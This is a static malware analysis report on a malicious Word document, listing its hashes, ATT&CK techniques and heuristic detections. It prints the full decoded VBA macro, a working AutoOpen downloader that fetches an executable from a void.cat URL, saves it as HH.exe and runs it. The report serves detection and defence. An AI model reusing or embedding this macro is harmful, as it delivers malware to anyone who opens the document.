Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94dcabdf3765e123…

MALICIOUS

Office (OLE)

48.5 KB Created: 2018-07-11 23:34:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 21b60a8b0761ffaf9722e26d6ed237bf SHA-1: fd8f74ff06bd865c44fe27580f4d37a59b786a9d SHA-256: 94dcabdf3765e1239b433b5788b46a95821d4453cb2b0574a90317e71f216518
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The VBA macro contains an AutoOpen subroutine that utilizes CreateObject to instantiate Microsoft.XMLHTTP and the embedded link objects. It then downloads a file from the URL https://void.cat/c3cb3f11bf1615e1ad7eaea6826b9d3d72d6c7f5, saves it as HH.exe, and executes it using the Shell function. This indicates a downloader pattern designed to fetch and run a secondary payload.

Heuristics 8

  • ClamAV: Doc.Macro.Downloader-6360614-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Downloader-6360614-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ("HH.exe")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     .write xHttp.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://void.cat/c3cb3f11bf1615e1ad7eaea6826b9d3d72d6c7f5 Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 699 bytes
SHA-256: b5743fad2b7093b29ee80d7345660a2a7f9a09dd09f27c21ff52b8eafc95dfe4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://void.cat/c3cb3f11bf1615e1ad7eaea6826b9d3d72d6c7f5", False
xHttp.Send

With bStrm
 .Type = 1 '//binary
 .Open
 .write xHttp.responseBody
 .savetofile "HH.exe", 2 '//overwrite
End With

Shell ("HH.exe")

End Sub